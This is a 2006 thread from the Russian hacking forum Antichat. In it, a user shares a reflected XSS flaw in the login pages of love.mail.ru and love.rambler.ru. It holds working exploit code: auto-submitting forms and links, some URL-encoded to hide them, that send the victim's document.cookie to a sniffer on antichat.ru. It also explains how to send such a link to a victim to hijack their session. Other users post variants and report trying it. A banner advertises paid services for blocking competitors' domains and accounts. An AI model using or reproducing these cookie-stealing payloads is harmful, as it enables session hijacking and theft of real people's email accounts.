Форум АНТИЧАТ - XSS mail.ru rambler.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
XSS mail.ru rambler.ru

Страница 1 из 7

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

XSS mail.ru rambler.ru

04.12.2006, 20:40

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

XSS mail.ru rambler.ru

Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

Старый добрый дядя slider вам расскроет тайну Да.. да... прям возьмём и угоним сессию..

Короче ... дело было вечером .. делать было нечего..
и полез я искать уязвимости на этих почтовиках..

После многих часов поиска (уважайте чужой труд!

) нашол таки...
в файле http://love.mail.ru/my/login.phtml скрытую строку:

Код HTML:

<input type="hidden" name="tcurl">

Да да... именно она слабое звено!...
паразитка такая не фильтруетсо =)

вбил я в нее "><script>alert()</script> и вылез заветный алерт!..

А вот тут по сценарию вам надо дать exploit ))
С переадрессацией и со всеми наворотами ))

А вот он б*я =)

майл.ru

Код HTML:

<body onload="p.submit()">
<form action="http://love.mail.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>

рамблер.ru

Код HTML:

<body onload="p.submit()">
<form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>

СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

А вот причём... кука прийдёт и от лов и от майла! =)
Так что статейка думаю многим пригодистя =)

Ну что.. время пошло кто не успел тот опоздал... =)
Торопитесь время акции ограничего =)

С уважением slider

Ахх да... как юзать ))
Сохраняете этот "сплойт" в html и качаете на народ.ru
далее даёте ссылку комунить на свой "скрипт"... ))
Удачи!..

Вот вам ещё скриптеГ =)

Код HTML:

http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

Код HTML:

http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E

Последний раз редактировалось slider; 05.12.2006 в 17:48..

04.12.2006, 20:53

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Засекаем время сколько бага проживет =)

04.12.2006, 20:56

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

Отпишитесь хоть.. КОМУ пригодилось! =)

04.12.2006, 21:14

[loy]

Участник форума

Регистрация: 24.03.2006

Сообщений: 184

Провел на форуме:
344009

Репутация: 72

http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3Cscript%3Ealert('12');%3 C/script%3E%22!--%3C

или так http://love.mail.ru/my/login.phtml?tcurl="><script>document.location='htt p://forum.antichat.ru';</script><!--"
<a href='http://love.mail.ru/my/login.phtml?tcurl="><script>document.location=\'ht tp://forum.antichat.ru\'</script><!--"'>ФОрум</a>

я конечно не понял точно как сделал слайдер
но вот как я сделел

Последний раз редактировалось [loy]; 04.12.2006 в 21:28..

04.12.2006, 21:18

Chumak

Познающий

Регистрация: 27.10.2006

Сообщений: 59

Провел на форуме:
239086

Репутация: 6

Мда только жаль что я ен умею этим пользоваться..

04.12.2006, 21:20

Chumak

Познающий

Регистрация: 27.10.2006

Сообщений: 59

Провел на форуме:
239086

Репутация: 6

"Торопитесь время акции ограничего =)"
Мда

04.12.2006, 21:31

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

И так можно использовать!!! =)
но это как то банально!

Последний раз редактировалось slider; 04.12.2006 в 21:41..

04.12.2006, 22:15

MegaBits

Участник форума

Регистрация: 30.08.2006

Сообщений: 181

Провел на форуме:
1058786

Репутация: 45

Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.

04.12.2006, 22:30

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

Провел на форуме:
3212607

Репутация: 454

Цитата:

Сообщение от MegaBits

Обычная пассивная xss
Жертва должна перейти по ссылке, либо быть перенаправленной на нее

#10

04.12.2006, 22:31

xzz

Новичок

Регистрация: 06.11.2006

Сообщений: 2

Провел на форуме:
67228

Репутация: -2

Только что опробовал, сделал все как по учебнику ,скрипт вроде рабочий,..но мля куки на снифер не летят.
Кто нить знает в чем причина? В снифере, как была одна запись ...так одна и есть. Mожет я не правильно снифер зарегал ? В " Картинка" что нано писать? Изаиняюсь за дебильные вопросы........

Последний раз редактировалось xzz; 04.12.2006 в 22:44..

Страница 1 из 7

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Реализация XSS на rambler.ru	Майор	E-Mail	8	21.09.2006 20:50
Xss на mail.ru	em00s7	E-Mail	14	08.06.2006 00:38
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход